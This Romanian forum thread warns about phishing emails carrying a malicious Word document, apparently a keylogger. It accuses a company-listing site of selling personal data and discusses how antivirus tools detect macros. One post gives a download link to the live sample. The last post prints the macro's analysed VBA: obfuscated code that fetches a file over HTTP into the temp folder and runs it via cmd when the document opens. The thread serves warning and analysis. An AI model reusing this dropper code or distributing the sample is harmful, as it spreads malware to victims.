Jump to content
TAJ

Listafirme.ro contribuie la fraude informatice.

Recommended Posts

De cateva zile tot primesc niste emailuri false. In prima faza am crezut ca e un document de la contabila mea, dar defapt s-a dovedit a fi o mare teapa.

Am primit un email cu un document virusat. Cand l-am descarcat l-a sters antivirusul. La o analiza mai detaliata am vazut ca este un keylogger.

Pe adresa de email am 50 de sub-adrese: plm_Ceva-listafirme@yahoo.com, plm_Ceva-rstforums@yahoo.com etc etc

Am primit mail de la listafirme.ro

Desteptii de la listafirme.ro vand baza lor de date cu: Nume/Prenume, Telefon, Firma inregistrata, Email etc etc.

Din punctul meu de vedere, acesti indivizi contribuie la fraude odata ce colecteaza o baza de date, apoi o vand unor hackeri, scammeri, carderi etc.

In momentul in care i-am contactat si le-am cerut explicatii, mi-au zis ca imi vor sterge contul ca sa nu mai fiu spamat/sunat pe telefon sa mi se faca fel si fel de oferte de tepe, dar nicidecum sa nu mai vanda datele personale ale unor oameni care isi infiinteaza o firma sau au cont la ei pe site.

Mare atentie la aceste documente. Sa nu fiti victima hotilor!!!

Download https://www.sendspace.com/file/9vthap

https://www.virustotal.com/en/file/6d240189783402f2a0662351b69a9fd6b14b798d1d2a3046d61ee5e8a6172733/analysis/1439528103/

http://i.imgur.com/J1mtEJv.png

J1mtEJv.png

EDIT:

PRIMA VICTIMA: O cunostinta de a mea https://rstforums.com/forum/105316-virsus-ce-ma-pune-sa-platesc-2-btc-pentru-recupera-fisierele-ajutor-urgent.rst

Edited by TAJ
Link to comment
Share on other sites

Vor vedea ei postarea aici pe forum, nu-ti fa probleme.

"Perfect ai fost intre cei perfecti si s-a gasit in tine viclesug [...]".

De ce sa nu faci un lucru bun daca il poti face si preferi sa lasi problema sa dospeasca ?

La acele mail-uri am facut forward catre e-frauda (cybercrime), si voi mai face la orice scam primit. Doar pentru ca pot si pentru ca nu este un lucru rau.

Link to comment
Share on other sites

"Perfect ai fost intre cei perfecti si s-a gasit in tine viclesug [...]".

De ce sa nu faci un lucru bun daca il poti face si preferi sa lasi problema sa dospeasca ?

La acele mail-uri am facut forward catre e-frauda (cybercrime), si voi mai face la orice scam primit. Doar pentru ca pot si pentru ca nu este un lucru rau.

Oricum am raportat, dar vor vedea si aici baietii undercover.

Nu am deschis documentul pentru ca stiu despre ce este vorba, dar daca nu ma atentiona antivirusul, erau sanse 50% sa musc momeala.

Link to comment
Share on other sites

Metoda foarte penibila de a face bani, (furt) Acum daca stam sa analizam putin mai profund cazul acesta, posibil chiar ei sa trimita aceste mailuri sau angajati din cadrul "listafirme.ro" ideea este sa te duci personal la IGP sau la DIICOT si sa depui plangere, daca te duci la sectia x politie posibil sa stea mult si bine reclamatia intr-un sertar in nustiu ce birou, sau in nu stiu ce debara a politiei!

Foarte urat din partea lor!

Link to comment
Share on other sites

Salut, as avea si eu o intrebare. Care este metoda prin care un antivirus isi da seama ca fisierul este sau nu virus? Eu ma gandeam ca tine intr-o baza de date hash-ul virusilor descoperiti si dupa ce calculeaza hash-ul fisierului uploadat il compara cu cele din baza. Sau merge la nivel inferior si citeste intructiunile din spate?

Ma gandesc ca macrourile astea nu sunt detectate tocmai pt ca astia schimba continutul fisierului? Ma poate ajuta careva cu o informatie? Multumesc.

Link to comment
Share on other sites

  • Active Members
Salut, as avea si eu o intrebare. Care este metoda prin care un antivirus isi da seama ca fisierul este sau nu virus? Eu ma gandeam ca tine intr-o baza de date hash-ul virusilor descoperiti si dupa ce calculeaza hash-ul fisierului uploadat il compara cu cele din baza. Sau merge la nivel inferior si citeste intructiunile din spate?

Ma gandesc ca macrourile astea nu sunt detectate tocmai pt ca astia schimba continutul fisierului? Ma poate ajuta careva cu o informatie? Multumesc.

Exista diferite tipuri de a detecta virusii:

- antivirusul se uita la binary markup-ul fisierului pentru a face match in baza de date ce contine virusi si troiani.

- verifica ce face programul respectiv + vede daca el face ceva similar virusilor

- analizeaza sursa programului si cauta bucati de cod malitioase ( asta este de multe ori foarte dificil si de obicei doar antivirusii foarte avansati folosesc aceasta metoda + este foarte lenta)

Link to comment
Share on other sites

Uite pai si daca ala care trimite doc-ul de fiecare data face un doc nou in care pune text aleator si apoi injecteaza macro vb nu va avea de fiecare data binary markup diferit? Ceea ce face foarte grea misiunea pt antivirus.

O colega de serviciu a primit sapt asta un doc atasat cu o factura chipurile. In doc erau niste litere la plezneala cam 500 de caractere.

Link to comment
Share on other sites

  • Active Members
Uite pai si daca ala care trimite doc-ul de fiecare data face un doc nou in care pune text aleator si apoi injecteaza macro vb nu va avea de fiecare data binary markup diferit? Ceea ce face foarte grea misiunea pt antivirus.

O colega de serviciu a primit sapt asta un doc atasat cu o factura chipurile. In doc erau niste litere la plezneala cam 500 de caractere.

Exista destule software-uri care pot detecta malicious macro.

Link to comment
Share on other sites

Cred ca este aproximati acelasi explit, la fel am primit si eu tot pe mailul de la firma(mail intern), doar ca la mine se numea: 9C_D36974_219373.doc .

L-am scanat pe virustotal si in acel moment doar un singur antivirus l-a recunoscut( Arcabit )

Am primit aproximativ 15 mailuri cu numele diferit la documente de la 15 firme diferite.

Link to comment
Share on other sites

Cred ca este aproximati acelasi explit, la fel am primit si eu tot pe mailul de la firma(mail intern), doar ca la mine se numea: 9C_D36974_219373.doc .

L-am scanat pe virustotal si in acel moment doar un singur antivirus l-a recunoscut( Arcabit )

Pui si un link la analiza VT?

Campania curenta foloseste cod comun, care este detectat de majoritatea AV.

Link to comment
Share on other sites

ca idee:

20: M 3760 'VBA/Module1'

Plugin: VBA summary plugin

Attribute VB_Name = "Module1"

Sub FUfhVHJF()

Open "PCWNTU.LGL" For Binary As 24

IUTGUsdf.Open "GET", Module2.YGKkasdf, False

Open "KXAZHV.ZFB" For Binary As 64

Open "AMUTZG.QST" For Binary As 93

Open "YMCLUQ.YJV" For Binary As 13

Open "XVRHOM.DAU" For Binary As 74

Open "ACMTFH.AWW" For Binary As 84

Open "SUGAOT.XBD" For Binary As 37

Open "EQXBQF.XVK" For Binary As 99

Open "UQSDHP.JEP" For Binary As 29

End Sub

21: M 1400 'VBA/Module2'

Plugin: VBA summary plugin

Attribute VB_Name = "Module2"

Public Function YGKkasdf()

End Function

22: M 3893 'VBA/Module3'

Plugin: VBA summary plugin

Attribute VB_Name = "Module3"

Public Function YgVBNCB()

Open "XJZFQZ.XFE" For Binary As 72

FYFhvj = "T"

Open "NHKEHV.PIJ" For Binary As 82

pOPad = FYFhvj + "EM"

Open "JMBNKU.JKN" For Binary As 53

YgVBNCB = pOPad + "P"

End Function

Public Function cXXXdsf()

Open "RKWJOM.FPM" For Binary As 12

tFTY = "Mic"

Open "OKQTFH.IGS" For Binary As 22

yuITUffvvvv = "ft.XM"

Open "BXKEHB.HVW" For Binary As 84

cXXXdsf = tFTY + "roso" + yuITUffvvvv + "LHTTP"

End Function

Public Function FcbncvC()

Open "SXEQXP.TOB" For Binary As 34

ytrRReef = "DOD"

Open "JXLBZY.NFJ" For Binary As 53

tyurddvh = "Str"

Open "WWOFIZ.FIT" For Binary As 63

FcbncvC = "A" + ytrRReef + "B." + tyurddvh + "eam"

End Function

23: M 1135 'VBA/Module4'

Plugin: VBA summary plugin

Attribute VB_Name = "Module4"

Public Function UFGisdf()

UFGisdf = Environ(Module3.YgVBNCB) & "/dfsdFFv.exe"

End Function

Public Function VKHdsfsdf()

VKHdsfsdf = Shell("cmd /c start %TMP%/dfsdFFv.exe")

End Function

24: M 1383 'VBA/ThisDocument'

Plugin: VBA summary plugin

Attribute VB_Name = "ThisDocument"

Attribute VB_Base = "1Normal.ThisDocument"

Sub bvghVGxcx()

End Sub

Sub AutoOpen()

End Sub

Sub Workbook_Open()

End Sub

25: m 998 'VBA/ThisDocument1'

Plugin: VBA summary plugin

Attribute VB_Name = "ThisDocument1"

Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

26: M 1442 'VBA/ThisDocument2'

Plugin: VBA summary plugin

Attribute VB_Name = "ThisDocument2"

Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

Sub bvghVGxcx()

End Sub

Sub AutoOpen()

End Sub

Sub Workbook_Open()

End Sub

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...